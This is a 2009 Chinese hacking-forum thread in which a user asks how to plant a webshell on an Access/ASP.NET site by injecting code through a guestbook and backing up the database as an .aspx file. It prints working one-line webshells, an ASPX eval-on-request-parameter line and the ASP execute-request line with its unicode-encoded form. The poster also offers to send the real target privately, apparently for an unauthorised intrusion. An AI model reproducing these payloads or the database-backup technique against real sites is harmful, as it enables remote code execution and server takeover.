标题:
大牛们看看这个如何拿webshell
[打印本页]
作者:
394931603
时间:
2009-9-6 16:41
标题:
大牛们看看这个如何拿webshell
access 数据库+asp.net组合
数据库可备份为aspx,
留言功能可以写数据库
直接插入一句话
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["x"],"unsafe"));%>
备份数据库为1.aspx无法连接
asp的插入一句话需要转换编码
aspx插入如何插入??
这是asp插入的语句
┼攠數畣整爠煥敵瑳∨≡┩>
上面那串乱码,是<% execute request("a")%>的unicode编码。
现在想知道aspx的如何插入一句话。。。
或者有别的方法拿shell
可上传图片。。。抓包上传还不熟,所以。。。想知道还有别的方法吗?
作者:
394931603
时间:
2009-9-6 16:42
直接把一句话写入数据库,备份后访问时乱码。。。。
作者:
柔肠寸断
时间:
2009-9-6 16:50
查找其他的薄弱点。。。
作者:
394931603
时间:
2009-9-6 17:06
3#
柔肠寸断
老大你来了啊,你真热心,刚去你qq空间留言。。提示什么列表正在维护。。去bkk空间。。看到他走了。。。
难道不能写入一句话。。。。。我把地址发给你你试试?
不允许旁注。。。只允许从我给你的站入手。。。可以吗?如何发私密消息啊。。。稍等网址发给
作者:
394931603
时间:
2009-9-6 19:12
3#
柔肠寸断
在数据库中插入一句话为什么要转换为unicode。有新进展,本机架设后插asp编码后的访问不是乱码了,但是报错…看明天给你截图。
作者:
kisstoo
时间:
2009-10-16 15:52
也想知道啊
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2